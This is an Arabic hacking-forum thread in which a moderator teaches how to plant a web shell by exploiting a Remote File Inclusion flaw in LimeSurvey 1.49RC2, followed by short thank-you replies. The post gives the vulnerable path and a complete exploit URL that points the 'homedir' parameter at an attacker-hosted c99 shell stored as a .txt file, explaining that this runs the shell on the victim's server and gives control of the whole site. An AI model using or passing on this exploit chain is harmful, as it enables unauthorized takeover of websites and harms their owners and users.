اشترك في قناتنا ليصلك جديدنا

اشترك في قناتنا على اليوتيوب ليصلك جديدنا

كذلك الاعجاب بصفحتنا على الفيسبوك

طرق رفع الشل الجزء 2

طرق رفع الشل الجزء 2


صفحة 1 من 4 123 ... الأخيرةالأخيرة
النتائج 1 إلى 10 من 31

الموضوع: طرق رفع الشل الجزء 2

  1. #1
    :: مشرف عام :: Aljyyosh Team Array الصورة الرمزية BLACK.JaGuAr
    تاريخ التسجيل
    Jun 2009
    الدولة
    أصل العرب
    المشاركات
    2,299

    Hasri طرق رفع الشل الجزء 2




    كيف الحال يا شباب عساكم بخير ان شاء الله، اليوم راح نتناول طريقه أخرى من الطرق الخاصه برفع الشل لنتابع ....


    - رفع الشيل عبر ثغرات File Include فايل إنكلود -


    اليوم راح نتناول طريقه رفع الشل من خلال ثغره فايل إنكلود ، ويمكننا البحث عن الثغرات من خلال أحد مواقع الحمايه وأهمها موقع




    أنا أخترت ثغره من الميلوورم ، وبياناتها كما في الصورة التالية :



    كما هو واضح من الصورة هذه هي بيانات الثغرة وقد قسمتها لجزئين الأول خاص ببيانات الثغره التي تهمنا ، والجزء الثاني هو الإستغلال ، وسوف نتناول في البداية الجزء الأول ...


    طبعاً هنالك عدة نقاط يجب معرفتها قبل عملية الاختراق ومن خلال النظر في الصورة نجد أن النقاط أو المعلومات التي تهمنا هي :
    1- نوع الثغره ومن الصورة نجد أن نوعها هو ..
    كود:
    Type : RFI(Remote File Include)
    أي ثغره من نوع فايل إنكلود .

    2- اسم السكربت المصاب :
    كود:
    ****** name : LimeSurvey (PHPSurveyor)
    3-الإصدار المصاب وهو :
    كود:
    Version : 1.49RC2


    المعلومة الأخيرة التي نحتاجها موجودة في القسم رقم 2 وهي الإستغلال وكما نلاحظ هنالك العديد من طرق الإستغلال للثغره ، وسوف نتناول أحدها :
    كود:
    /admin/classes/pear/OLE/PPS/File.php?homedir=[****l]


    الأن سوف نقوم بتطبيق المعطيات السابقه ، أمامنا كمثال الموقع التالي :
    كود:
    http://victim.com
    والسكربت المصاب والإصدار هو :
    كود:
    LimeSurvey والإصدار 1.49RC2
    وهو راكب عليه هكذا :
    كود:
    http://victim.com/ls


    إذا بما أن السكربت داخل مجلد ls فان تطبيق الاستغلال سوف يكون كما يلي :
    كود:
    http://victim.com/ls/admin/classes/pear/OLE/PPS/File.php?homedir=[****l]


    بكذا نكون طبقنا الإستغلال وتبقى لنا إستبدال عبارة [****l]برابط الشل الذي رفعناه في الدرس السابق على مساحتنا المجانية ولنفرض أن رابط الشل كما يلي :
    كود:
    http://mysite.com/black/c99.txt
    لاحظوا أن امتداده txt وليس php وهذا أمر مهم جداً لأننا نريد سحب الأكواد من المفكرة وترجمتها بالموقع المصاب وليس قراءة الملف في الموقع اللي رافعين عليه الشيل




    وعليه سوف يكون الاستغلال بصورته النهائية كما يلي :


    كود:
    http://victim.com/ls/admin/classes/pear/OLE/PPS/File.php?homedir=http://mysite.com/black/c99.txt?
    وبكذا نكون أمرنا السكريبت بأن يقوم بإدراج أكواد هذي الصفحة :
    كود:
    http://mysite.com/black/c99.txt
    داخل موقع الضحية وقراءتها على سيرفر الضحية ، ونقدر نتحكم بالموقع كامل من خلال هذي الطريقه ..



    وكذا نكون قد اتممنا الجزء 2 وإلى لقاء قادم إنشاء الله


    ودمتم سالمين

    التعديل الأخير تم بواسطة BLACK.JaGuAr ; 10-08-2009 الساعة 07:18 PM


  2. #2
    هكر متميز Array الصورة الرمزية System 32
    تاريخ التسجيل
    Sep 2009
    الدولة
    System 32
    المشاركات
    634

    افتراضي رد: طرق رفع الشل الجزء 2

    رووووووووووووووووووعه يعطيك الف عافيه
    تقبل مروووري


  3. #3
    هكر متميز Array الصورة الرمزية هاوي حنانك
    تاريخ التسجيل
    Jun 2009
    الدولة
    أرض الحرمين
    المشاركات
    1,595

    افتراضي رد: طرق رفع الشل الجزء 2

    الله يعطيك العافيه مجهووود رااائع ,,,,,,,,,,,,,,,,



  4. #4
    هكر مبتديء Array
    تاريخ التسجيل
    Dec 2009
    الدولة
    بعيد عن أهلي
    المشاركات
    45

    افتراضي رد: طرق رفع الشل الجزء 2

    الله يعطيك العافيه


  5. #5
    هكر مجتهد Array الصورة الرمزية اسد سوريا
    تاريخ التسجيل
    Sep 2009
    المشاركات
    275

    افتراضي رد: طرق رفع الشل الجزء 2

    عاشت ايدك يامشرفنا


  6. #6
    هكر مجتهد Array الصورة الرمزية Dr.R00T
    تاريخ التسجيل
    Nov 2009
    الدولة
    Ҝ . $ . Ẫ
    المشاركات
    246

    افتراضي رد: طرق رفع الشل الجزء 2

    تسلم يدينك والله

    مشكووووووووووووووور على الدرس والشرح الوافي

    تقبل مروري



  7. #7
    هكر مبتديء Array
    تاريخ التسجيل
    Jan 2010
    المشاركات
    11

    افتراضي رد: طرق رفع الشل الجزء 2

    إنت خطير
    مشكور حبيبي

    والله يعطيييييييييييك مليون عافية


  8. #8
    هكر مبتديء Array
    تاريخ التسجيل
    Jan 2010
    المشاركات
    29

    افتراضي رد: طرق رفع الشل الجزء 2

    مشكوووووووووووووووووووور


  9. #9
    هكر مبتديء Array
    تاريخ التسجيل
    Mar 2010
    المشاركات
    4

    افتراضي رد: طرق رفع الشل الجزء 2

    مشكووووووورررررر يالغالى أخى أريد سيرفر مجانى أرفع عليه الشل تبعى هل تعرف



  10. #10
    هكر مبتديء Array
    تاريخ التسجيل
    Apr 2010
    المشاركات
    18

    افتراضي رد: طرق رفع الشل الجزء 2

    مشكور اخي على المجهود الطيب


صفحة 1 من 4 123 ... الأخيرةالأخيرة

المواضيع المتشابهه

  1. شل r57 شغال رابط الشل ومحتوى الشل في نوتباد رابط 100%100
    بواسطة ikuwaite في المنتدى اختراق المواقع والسيرفرات
    مشاركات: 75
    آخر مشاركة: 11-26-2012, 07:22 PM
  2. موسوعة أوامر الشل + لينكس ( الجزء الأول )
    بواسطة BLACK.JaGuAr في المنتدى اختراق المواقع والسيرفرات
    مشاركات: 4
    آخر مشاركة: 02-29-2012, 10:00 PM
  3. طرق رفع الشل الجزء 1
    بواسطة BLACK.JaGuAr في المنتدى اختراق المواقع والسيرفرات
    مشاركات: 245
    آخر مشاركة: 12-16-2011, 03:40 PM
  4. موسوعة أوامر الشل + لينكس ( الجزء الثاني )
    بواسطة BLACK.JaGuAr في المنتدى اختراق المواقع والسيرفرات
    مشاركات: 5
    آخر مشاركة: 12-15-2011, 01:15 PM
  5. رفع الشل + ملف الشل + طريقة الدخول اليه
    بواسطة الحريف في المنتدى اختراق المواقع والسيرفرات
    مشاركات: 12
    آخر مشاركة: 09-17-2010, 11:28 PM

وجد الزوار هذه الصفحة بالبحث عن:

طرق رفع الشل الجزء 2

جميع طرق رفع الشل

كيف يتم رفع الشيل

-شرح طريقة رفع الشل

طرق رفع الشل الجزء 2 جيوش الهكر

طرق رفع الشل

طريقة رفع الشل بالصور

كيفية رفع الشل

رفع الشل بالميتاسبلويت

اختراق ورفع الشلكيف ارفع الشل بالميتاسبلويتكيفية رفع الشل بالصورطرق رفع الشل الجزء2ازاي ارفع الشلالضحية ترفع الشلكيفية رفع الشال في سيرفركيف ارفع الشلبعض طرق رفع الشلكيف ارفع الشيلرفع الشلرفع الشل مرفقاتافضل طريقة لرفع الشيلرفع الشل Jemboطرق رفع الشل الجز الثانيطرق رفع الشل الجزء 1

المفضلات

أذونات المشاركة

  • لا تستطيع إضافة مواضيع جديدة
  • لا تستطيع الرد على المواضيع
  • لا تستطيع إرفاق ملفات
  • لا تستطيع تعديل مشاركاتك
  •